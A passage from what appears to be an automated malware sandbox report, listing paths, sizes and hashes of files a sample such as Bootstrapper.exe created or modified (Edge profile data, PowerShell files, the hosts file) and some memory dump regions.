60e2d8715b5bddf19149c93f9bea2abd

SHA1
634c57995fe299faf59da6f288cd87538e287e46

SHA256
e7e2e9029760d1b02048f491b3eb8958b3dd3562a28086a54c10874b5b379714

SHA512
d7cbc82d56bebe1168ea1e11283d65e18fbfbbe1e36cbadb25f96df7c577330256a167193166a50789e3aa1aa723f7c31f6cd62283fa38c1c64549765358b975

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
188B

MD5
008114e1a1a614b35e8a7515da0f3783

SHA1
3c390d38126c7328a8d7e4a72d5848ac9f96549b

SHA256
7301b76033c2970e61bab5eaddaff5aa652c39db5c0ea5632814f989716a1d18

SHA512
a202fc891eace003c346bad7e5d2c73dadf9591d5ce950395ff4b63cc2866b17e02bd3f0ad92749df033a936685851455bcdbfad30f26e765c3c89d3309cb82b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
e8bdfd6cf1fcab3a712bd3ee04072224

SHA1
dd77436f8fcbb866a1000db27264cc2e67a069a8

SHA256
f186bd54d6cf4df53b5fd9a17e73b5b6f675145658646cb7452a1b3224de74fb

SHA512
042daf34f9f4c95d87ebdb428860835d31849d0371a98fb29185d7be449ba2564e3a569fc58e2b794484ea7068c36aad6162698ae187163b9684766a3cf702d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
839e5ab4af267571b081ddb6a8ac3272

SHA1
07b1c0c4a5513048e2e7fb1c067678a0f8ddff2f

SHA256
0c3407c7bdb2a21e67ef8923a848944b629399686daadcad980578f4b6167c96

SHA512
e328a4d6b6a3cb5e15177d1e0b8b30c7c87507bf466258db96c2fe084e388d866df13e056be332d531496c1793199c1ea71eaf88b962a56f0b76d67c185508d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
27c505ac8074b8faddeb3b92009c9820

SHA1
13aad3aa3b85471cb3f3b7a82e7cc26551081418

SHA256
567c03f37c486d8b24885341bcc0dd42ccc8c52a38d7387b34333a7f0c1f232d

SHA512
b3d9cee768bad178857ba735b9539510927eb5eb6d95ec6100675046e500e5759c54a2e0540402cdaa361702cf556ab4e3d1f0433487fe04b53dbce9f064fac5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
7b72738c646ede981029a94fa5d0a377

SHA1
8d8dee951d5e3313733eb85190ce386796339fe9

SHA256
9561d7d09af7c6c2c3a9a57e79040f12fa511dc4ae1c2bc7a5a713571b32bdcc

SHA512
f0794f0963f4da8ecbab7b00ee253b8bfb2ae8589c7907737c2f419b0c44f634153d7435817ad6e0f6fbc146d302be08bb8507f43944e2d73148bb2fc981b7a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57ea9e.TMP

Filesize
48B

MD5
594760d0abdf4ba12d8fbfd54f2438e2

SHA1
36956b0ec0db35f64e40620370563bc3be4f55e1

SHA256
5841de7495f203443f5c152b79f095362499d4e0ce88bef5eae5396c71a38d48

SHA512
5cb580deb37b19e71c62f02251f53e7a23a3504f330123e4393b72393e1bed93383afa419da3d50b2e899a6ed9d01c0021602ea8026e83dcc616f2d2713a47a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
260911d0c778dee5b3a2f68e214559bc

SHA1
a3c3950ce9c6d41fd923b575f94073246cdffea2

SHA256
36d18387e0773f33a14a77369f76d3fb84e0d34d5461659de1bc8938c0759d04

SHA512
424bb6d3fe1e40d48dec82e2b5e79ec491a1abd9af80de4e7190dde22e976ad469b776c3716a06a6461ea38623cc6f5636c2c94020e6994e46dedfc6779c6f51

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
f15b470a0ca248b914416d2aa98bfa5e

SHA1
cc59f061413c53c9c2c1d1b34ff436f470a1afed

SHA256
995488a4448874189141e0d2e7fc64d3e1f06270aac792f37c9c0b6eed4029db

SHA512
f31ac2e54168a6d47cc374804e61efab43109b9870c79a06e8622ae1115fe73eef7e6a8d075193ec605dccbde109b6332d422f49ed3c2d73410d8dea9a53ae0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
45741c307af2576c6437c5fdb24ef9ce

SHA1
a6ba7a7705db14ac29a18a98dd7deb4cc759c3bf

SHA256
7887859f7179e194ff9b78f8d8fa3830790110a01597f21ff48c84cd935e49d2

SHA512
39fdc5931563cbf826e8b643b5f0dcdf45bb6f95a8eeb460499257ca41b3dbee4c692eaacc3fd33bddf4b6ff0c828981ed7e9cd080007bbb9f0b28e7d0d66941

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7332074ae2b01262736b6fbd9e100dac

SHA1
22f992165065107cc9417fa4117240d84414a13c

SHA256
baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

SHA512
4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1c0173315684736a04b0f5fe42957c12

SHA1
4f807eb7f4203987160503fc2144d4b3059d903c

SHA256
9200d881990608a02f4ea689d65c4c89893f08e209fed664442e18e6038283b8

SHA512
24f6ebc6cda60bfea224afc54d73fae5259f11d82b9ea47b3fb548214149036eef95279161eba28db0d74a4d397f7394c4c14adebe59dbd8da54ddf2dae242fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ogdzzizc.iay.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Bootstrapper.exe

Filesize
229KB

MD5
3d6b80f7e3dc40dba887db97de4b3700

SHA1
67a8ccb1c771b84b005062da63efe58a1347e25d

SHA256
b3d7972c218995c0b65fa02697717050b2d6862c70987b04403c8e27475e1698

SHA512
d51580327256198090588dc8c27cac6e337b21fbd525bc54852eaf06ecccc2aea0dc24491b1c639b7e8bc9218e29d4474961e24c7c6bafaeed173952cb556d47

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/3776-283-0x000001D1108D0000-0x000001D110910000-memory.dmp

Filesize
256KB

Download
memory/3776-315-0x000001D12AEC0000-0x000001D12AEDE000-memory.dmp

Filesize
120KB

Download
memory/3776-312-0x000001D12AEF0000-0x000001D12AF40000-memory.dmp

Filesize
320KB

Download
memory/3776-311-0x000001D12B0F0000-0x000001D12B166000-memory.dmp

Filesize
472KB

Download
memory/3776-351-0x000001D12AF40000-0x000001D12AF4A000-memory.dmp

Filesize
40KB

Download
memory/3776-352-0x000001D12AF70000-0x000001D12AF82000-memory.dmp

Filesize
72KB

Download
memory/3948-290-0x000001E13FD60000-0x000001E13FD82000-memory.dmp

Filesize
136KB

Download